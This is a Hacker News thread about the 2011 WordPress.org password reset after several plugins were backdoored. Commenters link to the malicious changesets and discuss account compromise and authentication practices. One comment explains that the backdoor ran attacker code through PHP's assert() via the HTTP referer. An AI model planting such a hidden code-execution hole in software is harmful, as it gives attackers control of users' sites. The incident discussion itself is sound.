

Passwords Reset (Wordpress Plugins Hacked) - telemachos
http://wordpress.org/news/2011/06/passwords-reset/

======
ck2
This is the timeline I see from when it happened?

[http://plugins.trac.wordpress.org/timeline?from=06%2F21%2F11...](http://plugins.trac.wordpress.org/timeline?from=06%2F21%2F11&daysback=1&authors=&changeset=on&update=Update)

<http://pastebin.com/raw.php?i=G06rbb5a>

Actually, maybe that is the reversion log, yeah it is.

Trying to find what they did:

[http://plugins.trac.wordpress.org/changeset?old_path=%2Fw3-t...](http://plugins.trac.wordpress.org/changeset?old_path=%2Fw3-total-
cache&old=399592&new_path=%2Fw3-total-cache&new=390000)

~~~
qixxiq
The diff is at:
[http://plugins.trac.wordpress.org/changeset?reponame=&ol...](http://plugins.trac.wordpress.org/changeset?reponame=&old=399310%40addthis&new=395689%40addthis)

PHP's assert function ridiculously runs eval() on the code too, so to use
their backdoor they just include code as their HTTP_REFERER.

~~~
PleaseStand
The backdoors in the two other plugins mentioned:

<http://plugins.trac.wordpress.org/changeset/399276>

<http://plugins.trac.wordpress.org/changeset/399286>

------
ck2
Maybe someone gained svn root? <http://svn.wp-plugins.org/>

The problem is while WordPress has evolved to a secure way of not storing
passwords but instead the salted hash, new passwords (and resets) are still
sent in the clear via very insecure, plain text email, and probably archived
forever on some services like gmail, hotmail, yahoo, etc.

~~~
dd32
I can't comment on how the accounts were compromised (As I'm not part of those
investigating) however I'm pretty sure I can say it's the accounts that were
compromised (As the commits came from the plugin owners accounts) and not the
svn server or svn root.

It looks like certain accounts were compromised, how? I don't know, It could
be anything from the users having weak passwords, or even MITM attack/sniffing
(Unsecured Wireless anyone? - I bet most of these authors have been to a
WordCamp or 2) - But like I said, I don't know how, that's pure speculation.

WordPress.org (and the WordPress Software itself) has not sent passwords in
emails for awhile now, except in cases where it's absolutely required.

When a user forgets their password, a email with a single-use url is sent,
that link allows them to change their password. Yes, If their email is
compromised, their account can be compromised.

When a user changes their password, It is not sent via email to the account
owner or site administrator.

When a New install is created, If the user enters a password during the
installation process, their password will not be sent via email. If they leave
it at the default randomly generated password, it WILL be emailed to them, and
they'll be asked to change it upon next login, They're expected to change it
when they login.

If a new user is added to a WordPress installation, and the admin sets a
password, they can choose to send an email to the user with their details.

It's all weighing usability vs. security against each other, the cases where
WordPress Core sends emails right now that includes a password, is very
minimal (and only in cases where it's actually required).

Some people choose to disable the password reset process entirely on their
installations, If you have server access, or a decent ammount of knowledge,
often it's an undeeded component.

~~~
noobiscus
"It looks like certain accounts were compromised, how? I don't know, "

Maybe they all had Playstations?

------
IgorPartola
It seems it is time to do away with password authentication and start thinking
in terms of pubkeys. I recently disallowed all password logins via SSH for all
the machines where I can do this. Next, I am looking into authenticating sudo
via ssh-agent through PAM (seems the code to do this is not available in
standard Ubuntu repos).

If only more places were OpenID enabled, there would be less passwords to
protect for the web.

~~~
ck2
Hmm, so what happens when your OpenID password or provider gets hacked?

~~~
IgorPartola
I currently run my own OpenID end point and once anything but HN and Stack
Overflow starts supporting it I will probably add two form auth and use
client-side certificates for authenticating with it. Also Google supports two
factor auth now and they are an OpenID provider too.

